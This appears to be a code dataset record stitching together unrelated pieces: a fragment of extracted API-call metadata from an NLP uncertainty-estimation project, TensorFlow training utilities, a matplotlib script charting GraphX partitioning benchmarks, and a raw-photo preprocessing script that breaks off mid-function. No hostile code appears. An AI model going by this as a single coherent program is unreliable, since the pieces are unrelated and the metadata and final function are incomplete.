(['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14495, 14518), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14698, 14709), 
'time.time', 'time.time', ([], {}), '()\n', (14707, 14709), False, 'import time\n'), ((15424, 15435), 'time.time', 'time.time', ([], {}), '()\n', (15433, 15435), False, 'import time\n'), ((1033, 1084), 'ue4nlp.dropout_mc.DropoutMC', 'DropoutMC', ([], {'p': 'ue_args.inference_prob', 'activate': '(False)'}), '(p=ue_args.inference_prob, activate=False)\n', (1042, 1084), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1754, 1795), 'utils.utils_dropout.set_last_dropconnect', 'set_last_dropconnect', (['model', 'dropout_ctor'], {}), '(model, dropout_ctor)\n', (1774, 1795), False, 'from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect\n'), ((1804, 1834), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.classifier'], {}), '(model.classifier)\n', (1816, 1834), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3237, 3300), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (3255, 3300), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3846, 3919), 'utils.utils_heads.ElectraClassificationHeadIdentityPooler', 'ElectraClassificationHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (3885, 3919), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((6859, 6935), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (6882, 6935), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7007, 7079), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (7026, 7079), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((10383, 10446), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (10401, 10446), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10992, 11054), 'utils.utils_heads.ElectraNERHeadIdentityPooler', 'ElectraNERHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (11020, 11054), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((11100, 11154), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (11136, 11154), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, 
BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((14022, 14098), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14045, 14098), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14170, 14242), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14189, 14242), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1198, 1293), 'ue4nlp.dropconnect_mc.LinearDropConnectMC', 'LinearDropConnectMC', ([], {'linear': 'linear', 'p_dropconnect': 'ue_args.inference_prob', 'activate': 'activate'}), '(linear=linear, p_dropconnect=ue_args.inference_prob,\n activate=activate)\n', (1217, 1293), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((4109, 4148), 'utils.utils_heads.XLNetClassificationHeadIdentityPooler', 'XLNetClassificationHeadIdentityPooler', ([], {}), '()\n', (4146, 4148), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((4194, 4248), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (4230, 4248), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((5444, 5493), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (5454, 5493), True, 'import numpy as np\n'), ((12061, 12103), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12067, 12103), True, 'import numpy as np\n'), ((12609, 12658), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (12619, 12658), True, 'import numpy as np\n'), ((2014, 2069), 'ue4nlp.dropout_mc.convert_to_mc_dropout', 'convert_to_mc_dropout', (['model', "{'Dropout': dropout_ctor}"], {}), "(model, {'Dropout': dropout_ctor})\n", (2035, 2069), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((5143, 5188), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5152, 5188), True, 'import numpy as np\n'), ((12263, 12308), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12272, 12308), True, 'import numpy as np\n')]
|
import os
import errno
import numpy as np
import tensorflow as tf
def create_path(path):
    """Create the directory path if it does not already exist."""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
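# Convolution block: conv -> ReLU -> optional 2x2 max-pool -> dropout. Filter weights are
# created with tf.get_variable and a truncated-normal initializer (TF1-style graph API).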
def conv_layer(name, input_tensor, ksize, num_out_channels, keep_prob, random_state,
max_pool=False):
input_channels = input_tensor.shape.as_list()[-1]
conv_filter = tf.get_variable(
'{}_filter'.format(name), [ksize[0], ksize[0], input_channels, num_out_channels],
tf.float32, tf.truncated_normal_initializer)
conv = tf.nn.conv2d(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name)
conv_relu = tf.nn.relu(conv, '{}_relu'.format(name))
if max_pool:
conv_maxpool = tf.nn.max_pool(
conv_relu, [1, 2, 2, 1], [1, 2, 2, 1], 'SAME', name='{}_maxpool'.format(name))
conv_dropout = tf.nn.dropout(conv_maxpool, keep_prob, seed=random_state, name='{}_dropout'.format(name))
return conv_dropout
conv_dropout = tf.nn.dropout(conv_relu, keep_prob, seed=random_state, name='{}_dropout'.format(name))
return conv_dropout
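# Random train/validation split over the rows of train_mtx and label_arr (default 80/20),
# seeded with random_state so the split is reproducible.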
def train_val_split(train_mtx, label_arr, random_state, train_proportion=0.8):
np.random.seed(random_state)
num_train_rows = np.round(train_mtx.shape[0] * train_proportion).astype(int)
rows_selected = np.random.choice(train_mtx.shape[0],
num_train_rows, replace=False)
rows_not_selected = list(
set(range(train_mtx.shape[0])) - set(rows_selected))
return (train_mtx[rows_selected], train_mtx[rows_not_selected],
label_arr[rows_selected], label_arr[rows_not_selected])
class Dataset():
def __init__(self, X, y):
self.X = X.copy()
self.y = y.copy()
class BatchManager():
def __init__(self, train_set, num_epochs, shuffle, random_state):
"""
train_set, val_set: RNNDataset instances
"""
self.train_set = train_set
self.num_epochs = num_epochs
self.shuffle = shuffle
self.random_state = random_state
self.current_epoch = 0
self.rows_in_batch = []
def next_batch(self, batch_size):
"""
Output next batch as (X, y), return None if ran over num_epochs
"""
num_rows = self.train_set.X.shape[0]
while len(self.rows_in_batch) < batch_size:
self.current_epoch += 1
row_nums = list(range(num_rows))
if self.shuffle:
np.random.seed(self.random_state)
np.random.shuffle(row_nums)
self.rows_in_batch += row_nums
selected_X = self.train_set.X[self.rows_in_batch[:batch_size]]
selected_y = self.train_set.y[self.rows_in_batch[:batch_size]]
self.rows_in_batch = self.rows_in_batch[batch_size:]
if self.current_epoch > self.num_epochs:
return None
return selected_X, selected_y
|
[
"numpy.random.seed",
"os.makedirs",
"tensorflow.nn.conv2d",
"numpy.random.choice",
"numpy.round",
"numpy.random.shuffle"
] |
[((616, 688), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['input_tensor', 'conv_filter', '[1, 1, 1, 1]', '"""SAME"""'], {'name': 'name'}), "(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name)\n", (628, 688), True, 'import tensorflow as tf\n'), ((1251, 1279), 'numpy.random.seed', 'np.random.seed', (['random_state'], {}), '(random_state)\n', (1265, 1279), True, 'import numpy as np\n'), ((1381, 1448), 'numpy.random.choice', 'np.random.choice', (['train_mtx.shape[0]', 'num_train_rows'], {'replace': '(False)'}), '(train_mtx.shape[0], num_train_rows, replace=False)\n', (1397, 1448), True, 'import numpy as np\n'), ((142, 159), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (153, 159), False, 'import os\n'), ((1301, 1348), 'numpy.round', 'np.round', (['(train_mtx.shape[0] * train_proportion)'], {}), '(train_mtx.shape[0] * train_proportion)\n', (1309, 1348), True, 'import numpy as np\n'), ((2549, 2582), 'numpy.random.seed', 'np.random.seed', (['self.random_state'], {}), '(self.random_state)\n', (2563, 2582), True, 'import numpy as np\n'), ((2599, 2626), 'numpy.random.shuffle', 'np.random.shuffle', (['row_nums'], {}), '(row_nums)\n', (2616, 2626), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
#################################################################################
# File Name : IPADS_GraphX_Plot_Partition_2.py
# Created By : xd
# Creation Date : [2014-08-14 22:09]
# Last Modified : [2014-08-14 22:11]
# Description : new partition plot to concern only about data
#################################################################################
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
def IPADS_GraphX_Plot(
data, ngroup, label, filename, xlabel, ylabel, title, xticks, legendPos, legendNcol
):
plt.clf() # Clear figure
N = ngroup
    step = len(data) // N
ind = np.arange(N) # the x locations for the groups
width = 0.1 # the width of the bars: can also be len(x) sequence
for i in range(0, step):
if i<len(label):
plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1)), label=label[i])
else:
plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1)))
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.title(title)
plt.xticks(ind + 2 * width, xticks)
plt.legend(loc=legendPos, ncol=legendNcol)
# plt.show()
plt.savefig(filename)
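# Each figure below reuses the same flat, interleaved data layout: with len(data)//ngroup
# interleaved series, series i occupies data[i::step] (one value per group of 16, 25 and
# 48 partitions); every call renders one grouped bar chart and writes it to `filename`.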
filename = "9.png"
data = [146559,
101280,
93529,
139790,
132659,
139120,
108985,
133896,
154567,
153680,
182312,
232833,
192383,
194857,
280573,
417558,
361235,
308501]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = 'Number of Partitions'
ylabel = 'Execution Time (second)'
title = 'Execution Time (in-2.0-1m V1000000 E8179662)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 2
ngroup = 3
# convert unit
data = [x / 1000.0 for x in data]
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
filename = "10.png"
data = [4.21914028911,
3.7368692711,
4.85803910642,
3.75580013086,
6.10288873181,
5.54774338168,
4.645440915,
4.17718818837,
4.31699997602,
5.38391002532,
7.15146857475,
6.36269531228,
5.12988273555,
4.75113421863,
5.18381478864,
5.9121127584,
8.46766006671,
7.35200459511]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (web-google-single V875713 E5105039)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
filename = "11.png"
data = [103, 105, 23, 23, 23, 22, 104, 105, 22, 21, 22, 22, 103, 103, 23, 22, 23, 22]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = '# of Partitions'
ylabel = 'Ingress Time (ms)'
title = 'Ingress Time by # of Partitions (web-google-single V875713 E5105039)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (web-google-single V875713 E5105039)'
filename = "12.png"
data = [1488.6714085, 753.544123521, 4227.30253826, 30134.8904464, 512.89786005, 642.786800653, 1243.13596746, 728.884052233, 19262.1185923, 5564.88385503, 436.401272225, 475.143767717, 1009.6037415, 573.291372919, 10666.0414354, 3999.63980127, 458.58901959, 422.537800331]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (web-google-single V875713 E5105039)'
filename = "13.png"
data = [2325.52199701, 1320.9993598, 7603.45404626, 2690.44774314, 607.542536448, 883.859326247, 1811.85158509, 1414.91908122, 3366.48905633, 7993.1149977, 484.047194393, 511.027285377, 1335.58608373, 828.842050936, 15417.097578, 4812.01482182, 350.905108825, 377.629861195]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
# xlabel = '# of Partitions'
# ylabel = '(max-min)/avg of vertices'
# title = '(max-min)/avg of vertices by # of Partitions (web-google-single V875713 E5105039)'
#
# xlabel = '# of Partitions'
# ylabel = '(max-min)/avg of edges'
# title = '(max-min)/avg of edges by # of Partitions (web-google-single V875713 E5105039)'
#
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "14.png"
data = [5.83256150348, 5.00636483715, 4.45356055641, 6.24904844096, 7.71010450388, 6.37401659512, 6.98455246968, 6.06394728411, 5.29022081368, 7.61019549791, 9.8903190897, 7.86495092078, 8.60331885804, 7.72158282983, 6.72133033224, 9.57859781734, 13.4800690903, 10.1176783177]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "15.png"
data = [1811.74003033, 1081.50691854, 290124.794151, 2445.98116497, 736.076632283, 731.045901004, 1711.13733125, 1208.98552514, 197679.735597, 3380.31018837, 924.754561167, 1134.14999784, 2296.44804677, 1286.57201168, 96026.7101455, 4257.20150275, 809.257504342, 778.212022131]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "16.png"
data = [9023.28625847,
9919.2555556,
19606.060674,
15191.7761438,
2424.12069674,
3144.04383754,
8524.25111277,
9485.00318575,
16107.8162292,
16489.4759357,
1886.11609229,
2797.04864341,
6773.90225036,
6602.12176671,
209703.384542,
12262.679599,
1090.59982998,
1621.1235011]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
|
[
"matplotlib.pyplot.title",
"matplotlib.cm.Paired",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.legend",
"numpy.arange",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((693, 702), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (700, 702), True, 'import matplotlib.pyplot as plt\n'), ((768, 780), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (777, 780), True, 'import numpy as np\n'), ((1147, 1165), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (1157, 1165), True, 'import matplotlib.pyplot as plt\n'), ((1170, 1188), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (1180, 1188), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1209), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (1202, 1209), True, 'import matplotlib.pyplot as plt\n'), ((1214, 1249), 'matplotlib.pyplot.xticks', 'plt.xticks', (['(ind + 2 * width)', 'xticks'], {}), '(ind + 2 * width, xticks)\n', (1224, 1249), True, 'import matplotlib.pyplot as plt\n'), ((1254, 1296), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'legendPos', 'ncol': 'legendNcol'}), '(loc=legendPos, ncol=legendNcol)\n', (1264, 1296), True, 'import matplotlib.pyplot as plt\n'), ((1319, 1340), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {}), '(filename)\n', (1330, 1340), True, 'import matplotlib.pyplot as plt\n'), ((1007, 1031), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1016, 1031), True, 'import matplotlib.cm as cm\n'), ((1120, 1144), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1129, 1144), True, 'import matplotlib.cm as cm\n')]
|
# -*- coding: utf-8 -*-
import numpy as np
from chainercv.visualizations import vis_bbox as chainer_vis_bbox
def vis_bbox(img, bbox, label=None, score=None, label_names=None, ax=None):
"""A wrapper of chainer function for visualizing bbox inside image.
Args:
img (~torch.tensor):
            an image whose shape is :math:`(3, H, W)` and whose format is RGB in [0.0, 1.0]
bbox (~torch.tensor):
bounding boxes we want to show.
Its shape is :math:`(N, 4)` and format is :math:`(x_\\mathrm{min}, y_\\mathrm{min}, \
x_\\mathrm{max}, y_\\mathrm{max})`
label (~torch.tensor):
labels of each bbox
score (~torch.tensor):
scores of each bbox
label_names (iterable of strings):
Name of labels ordered according to label ids.
If this is `None`, labels will be skipped.
"""
return chainer_vis_bbox(np.uint8(img * 255), bbox[:, [1, 0, 3, 2]],
label=label, score=score,
label_names=label_names, ax=ax)
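# A minimal usage sketch (hypothetical tensors, not part of the original module):
# vis_bbox expects a CHW RGB image in [0.0, 1.0] and boxes as
# (x_min, y_min, x_max, y_max); the column reorder above converts them to the
# (y_min, x_min, y_max, x_max) layout chainercv uses.
#
# import torch
# img = torch.rand(3, 224, 224)
# bbox = torch.tensor([[10.0, 20.0, 100.0, 120.0]])
# ax = vis_bbox(img, bbox, label=torch.tensor([0]), label_names=['person'])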
|
[
"numpy.uint8"
] |
[((915, 934), 'numpy.uint8', 'np.uint8', (['(img * 255)'], {}), '(img * 255)\n', (923, 934), True, 'import numpy as np\n')]
|
import os
import os.path as osp
import yaml
from operator import concat, sub
from utils.raw_utils import convert,scale,diff
from utils.io import imread, imwrite,get_exif,get_trip,raw2rgbg,mdwrite,raw_read_rgb,check_exif,extract_exif
from utils.isp import rgbg2linref, rgbg2srgb,rgbg2rgb
from utils.path import be,bj,mkdir
from multiprocessing import Pool, RawArray
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import exifread
import imageio
import rawpy
import cv2 as cv
from glob import glob
from utils.io import parse_tripr
subdirs=['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917','nikon_20200616', 'nikon_20200617']
def get_trips():
for input_folder in subdirs:
df=parse_tripr(input_folder)
df.to_csv(osp.join(input_folder,'trip.csv'),index=False)
bsd=None
def get5rgb(inputs,outputs,black_level=256):
"""inputs: ref, ab, f
outputs: ref, ab, f, fo, tran"""
check_exif(inputs)
rgbs=[raw_read_rgb(x) for x in inputs]
h,w,c=rgbs[0].shape
for out,rgb in zip(outputs[:3],rgbs):
imwrite(out,rgb)
# return
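    # Derived outputs, computed in the raw (Bayer) domain: 'fo' is raw(f) - raw(ab)
    # and 'tran' is raw(ab) - raw(ref); the black level is added back so values
    # remain valid raw counts, negatives are clamped to zero, and the result is
    # demosaiced with the camera white balance and downscaled by a factor of 2.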
raws=[rawpy.imread(x) for x in inputs[1:3]]
raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64)
- raws[0].raw_image_visible.astype(np.int64)
+ black_level,0).astype(np.uint16)
fo = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5)
imwrite(outputs[3],fo)
raws=[rawpy.imread(x) for x in inputs[:2]]
raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64)
- raws[0].raw_image_visible.astype(np.int64)
+ black_level,0).astype(np.uint16)
tran = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5)
imwrite(outputs[4],tran)
def batch5rgb(root:str,processes=16):
df=get_trip(root)
dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy()
out_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
# get5rgb(dfi[0],dfo[0])
# return
with Pool(16) as p:
ares = p.starmap_async(get5rgb, zip(dfi,dfo))
ares.wait()
def concat_bbs(root):
dfbd=pd.read_csv(osp.join(root,root+'.csv'))
dftrip=pd.read_csv(osp.join(root,'trip.csv'))
dfbb=pd.concat([dftrip,dfbd],axis=1)
dfbb.to_csv(osp.join(root,'bb.csv'),index=False)
from pprint import pformat
def exif_dbg():
path="nikon_20200616/raw/DSC_7550.NEF"
a=get_exif(path)
with open("exifnk.yaml",'w')as f:
f.write(pformat(a))
def tbnail_rgb(inputs,outputs):
r=1/16
for i,o in zip(inputs,outputs):
im=cv.imread(i)
if im is None:
print(i)
continue
# print(im.shape,im.dtype)
cv.imwrite(o,cv.resize(im,None,fx=r,fy=r))
def batch_rgbtb(root,fmt='rgbc'):
df=get_trip(root)
in_dirs=[osp.join(root,fmt,'origin'),osp.join(root,fmt,'derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.jpg'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,fmt,'thumbnail','origin'),osp.join(root,fmt,'thumbnail','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
with Pool(16) as p:
ares = p.starmap_async(tbnail_rgb, zip(dfi,dfo))
ares.wait()
def five(root,imformat='rgb'):
df=get_trip(root)
out_dirs=[osp.join(imformat,'thumbnail','origin'),osp.join(imformat,'thumbnail','derived')]
dfo=df.applymap(lambda x:f"})")
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:f"})")
mdwrite(osp.join(root,f'five{imformat}.md'),dfo)
def crop_rgb(inputs,outputs,bds):
w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]]
# print(h_start, w_start, h_end, w_end)
h_offset = (h_end-h_start)//32 * 32
w_offset = (w_end-w_start)//32 * 32
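    # Crop height/width are floored to multiples of 32, presumably so that
    # downstream networks with stride-32 feature maps receive evenly divisible inputs.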
for i,o in zip(inputs,outputs):
img=cv.imread(i)
# img=cv.resize(img,None,fx=0.5,fy=0.5)
cv.imwrite(o,img[h_start:h_start+h_offset,w_start:w_start+w_offset])
def batch_crop_rgb(root):
df=get_trip(root)
in_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.jpg'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,'rgbc','origin'),osp.join(root,'rgbc','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy()
# print(dfi[50])
# crop_rgb(dfi[50],dfo[50],dfbd[50])
# return
with Pool(16) as p:
ares = p.starmap_async(crop_rgb, zip(dfi,dfo,dfbd))
ares.wait()
def tbnail_raw(inputs,outputs):
r=1/16
imgs=[cv.resize(rgbg2srgb(imread(x),maximum=65535),None,fx=r,fy=r) for x in inputs[:5]]
for img,o in zip(imgs,outputs[:5]):
imwrite(o,img)
def batch_rawtb(root):
df=get_trip(root)
in_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.png'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.png'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,'rawc','thumbnail','origin'),osp.join(root,'rawc','thumbnail','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
with Pool(16) as p:
ares = p.starmap_async(tbnail_raw, zip(dfi,dfo))
ares.wait()
def get5rawc(inputs,outputs,bds):
"""inputs: gt, ab, f
outputs: gt, ab, f, fo, m"""
raws=[imread(x) for x in inputs]
w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]]
# print(h_start, w_start, h_end, w_end)
